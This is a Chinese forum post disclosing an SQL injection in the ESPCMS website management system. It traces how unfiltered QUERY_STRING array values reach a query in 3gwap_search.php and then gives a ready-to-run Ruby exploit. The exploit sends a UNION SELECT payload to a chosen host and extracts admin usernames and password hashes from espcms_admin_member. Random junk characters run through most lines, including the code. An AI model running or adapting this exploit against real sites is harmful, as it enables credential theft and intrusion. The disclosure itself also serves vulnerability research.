0×0 漏洞概述0×1 漏洞细节
. i; [1 N J4 {& ~$ k7 {0×2 PoC1 D7 }: t8 U, F; P) D0 T) a
. m7 P% z0 P2 H/ h7 w' I" \4 M
0 N- H/ X/ o/ s* e( I G
0 E3 b: }1 v( ]! K Z8 V: M3 u8 z4 a0×0 漏洞概述
2 e) f8 x* }; N' c3 w ~* c0 i+ y/ F8 w
易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统,它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便,可以帮您迅速、轻松地构建起一个强大专业的企业网站。0 V- z5 g: R) S- z" f C2 e' s$ b
其在处理传入的参数时考虑不严谨导致SQL注入发生
3 r1 m; a" t) K0 I
. t, [, `: k9 N* k& }0 b' J" U# @& r( Q$ m3 H
0×1 漏洞细节
+ G Q/ m( R2 t) d) d
& S6 q; s5 \; l- B! T, D6 [/ B变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query,整个过程无过滤导致了注入的发生。
* f W! ?) A( C5 F& A正因为变量是从$_SERVER['QUERY_STRING']中去取的,所以正好避开了程序的过滤。
" t4 r" `+ L: c7 M而注入的变量是数组的值,并非数组的key,所以也没过被过滤,综合起来形成了一个比较少见的SQL注入。
1 Q9 ?" o" |/ D. Y- X
* d$ y8 U: ~9 O3 X0 M ^; B: T在/interface/3gwap_search.php文件的in_result函数中:
2 ~0 d H( k. q p" r2 p
" U. N2 S8 t1 Z* h! C! c- |3 b
5 x! J' w+ |9 t( j% g# T. I
8 A+ C) h9 T% N* o8 c5 F& n function in_result() {+ _5 D( v9 p+ u% E# f
... ... ... ... ... ... ... ... ...% o' V) ~4 ~4 T# Z& L" G$ {
$urlcode = $_SERVER[ 'QUERY_STRING '];
" r8 _1 [: ]7 r8 M) l parse_str(html_entity_decode($urlcode), $output);! t+ s/ F$ W1 Q! J$ b
" \7 K2 G6 a' g e q, `/ g# V/ K ... ... ... ... ... ... ... ... ..., r1 D$ G/ N4 F( S7 u$ e9 F
if (is_array($output['attr' ]) && count($output['attr']) > 0) {
, \4 [* ~+ j3 ]$ A/ i" @
+ @5 e/ Q8 b2 b' Y $db_table = db_prefix . 'model_att';
5 J0 }( L0 _3 |' ~ g; B; s; ^2 `8 q. N X; u/ ~% v% j
foreach ($output['attr' ] as $key => $value) {
6 ]% x! H; E4 l' z" _3 Z [. M if ($value) {5 i7 a. B. q- s
2 D0 R+ `! y$ F- C- ] $key = addslashes($key);
: B! z" O- p1 t $key = $this-> fun->inputcodetrim($key);: Y3 O- x. K. W. _$ p9 N# h
$db_att_where = " WHERE isclass=1 AND attrname='$key'";6 r) r9 Y( p/ {& J" j4 Q$ Y" g
$countnum = $this->db_numrows($db_table, $db_att_where);
5 i: ~4 u% U! M. T' d if ($countnum > 0) {
" u4 H# [* D: z2 {9 a $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;3 y# u q- ], v
}
: } `+ E5 [& C& d& D$ f }
9 `( `" }, L$ B' @7 `; y- Q }; F1 `' d% h R8 }% t
}
5 o1 l4 r* g: n# Q% W9 B7 E$ j( k if (!empty ($keyword) && empty($keyname)) {6 A- B7 G" I4 _, k0 `! J
$keyname = 'title';
3 P% S: Z7 w5 Y' a! H! ` $db_where.= " AND a.title like '%$keyword%'" ;
7 m4 ?, M# K6 w; h' `2 x } elseif (!empty ($keyword) && !empty($keyname)) {& I3 K- n$ o% d
$db_where.= " AND $keyname like '% $keyword%'";
8 ]$ s+ j' G# T0 W1 Y5 v2 w+ X }
- F8 _ F: i' y$ \/ m; g9 } $pagemax = 15;" [5 u. |( q0 V+ y2 g
* g! n/ W4 c- B* B# T" \ $pagesylte = 1;
# g6 y. @6 o3 t' D8 u: ]/ }# u% c4 s4 G) V1 h
if ($countnum > 0) {
7 F- w4 ~$ T+ ]1 `- o5 S$ ?7 t1 K& [/ u' d1 D- Y0 x
$numpage = ceil($countnum / $pagemax);+ |# f$ y5 E P7 J. S, C
} else {
! M+ ?" e7 x9 f$ X $numpage = 1;
( G R' t( d# f( P" a, m# o9 A }( k" v( B5 [& ?4 j2 ]* W
$sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
/ |9 e' J1 I2 w3 i4 j: ~8 K$ }4 @ $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);5 g( z8 ], z4 s; s- t4 p
$sql = $this-> htmlpage->PageSQL('a.did' , 'down' ); $rs = $this->db->query($sql);
4 o- G6 e1 V) G, Z& ^9 f" w ... ... ... ... ... ... ... ... ...
% N& n- E6 Q- t$ U* B+ j }
0 A2 p# |$ U) P: W2 l
! Z8 d# |6 [5 ~8 s; c3 o. [0 L
, z$ x* Q9 [- U$ c0×2 PoC) w$ A: Q2 `/ n7 v Y
. H' C+ [8 R+ S" ~# f
% L3 v) U. H% ^- R* u( _8 f2 d
6 `+ w: l3 s: Y% {
require "net/http"
* d. u+ c- P3 y- U& D( M" T
% ]' ~. q7 @; gdef request(method, url)5 C0 P# C h+ F: e0 @: y1 M! d4 ?
if method.eql?("get")
) ^7 y* L' q; _3 P uri = URI.parse(url)% U8 k! R+ u5 s
http = Net::HTTP.new(uri.host, uri.port)8 |1 X$ H6 l, O' g% O ^: A( d" ^
response = http.request(Net::HTTP::Get.new(uri.request_uri)). g% A" f" r T# ]& e7 R- }+ s
return response4 D" w6 L0 q+ e' g3 _5 \% f! [: O
end& S. j8 O4 u8 D' Y* ^; z
end# _8 E* y/ a; c, n
8 M7 a) B! l6 ]& Q
doc =<<HERE$ w. i e% d; [2 L
-------------------------------------------------------
1 |! q5 `6 ]; _+ iEspcms Injection Exploit
" y! O, m2 ]& m6 TAuthor:ztz6 s" B, e: X& n# x. W) }! y
Blog:http://ztz.fuzzexp.org/& r% T% e. e* [* D
-------------------------------------------------------3 n( G% U" v& F5 c |2 a- U* {
/ X5 U" ~; `) G: r. a. F
HERE6 y+ l& v5 O+ G) x1 A
: |( J( O( ^) t/ ~8 x" r
usage =<<HERE
2 }' g9 a# ?5 B! @: ?1 G% B" IUsage: ruby #{$0} host port path" u" a4 w- V: B7 A5 A
example: ruby #{$0} www.target.com 80 /1 z" X+ O, a2 w0 M* H0 v
HERE
+ d1 k4 V$ N! o0 A/ L& l
# p' H; O& T& hputs doc
0 _5 h, l3 E9 V( @if ARGV.length < 3# A! m0 P0 V$ X4 j, X
puts usage( R6 L- O: n( w/ L; `6 _$ l
else
( j. u/ [3 O7 m7 f- U) F $host = ARGV[0]9 g/ z, Z6 s% o
$port = ARGV[1]( R O+ x) T$ y" l) G3 h
$path = ARGV[2]
$ k$ v+ a8 g4 a# e* U
/ i% ]7 x- a: D* v! d" T, I puts "send request..."
4 h& m8 E) f6 X' u url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
3 `; w. f& B d- R p" ]attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
0 ~: b! P/ P! S1 S, a: ?8 |,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,270 l3 {2 }+ g4 N, Q- W! n7 R
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23". ~1 `% M0 H% q0 k( t0 U
response = request("get", url). b6 a. E. \) }6 Q0 A
result = response.body.scan(/\w+&\w{32}/)( L0 a- p1 A# g' r7 O8 |
puts result4 P% ? e* _. _+ F* U* W7 M& H
end
) a9 n' _5 a' E' {5 U8 Z: a7 s* [3 n u$ ]+ l) _' }; S& ]
|
发表于 2013-7-27 18:31:52
收藏
支持
反对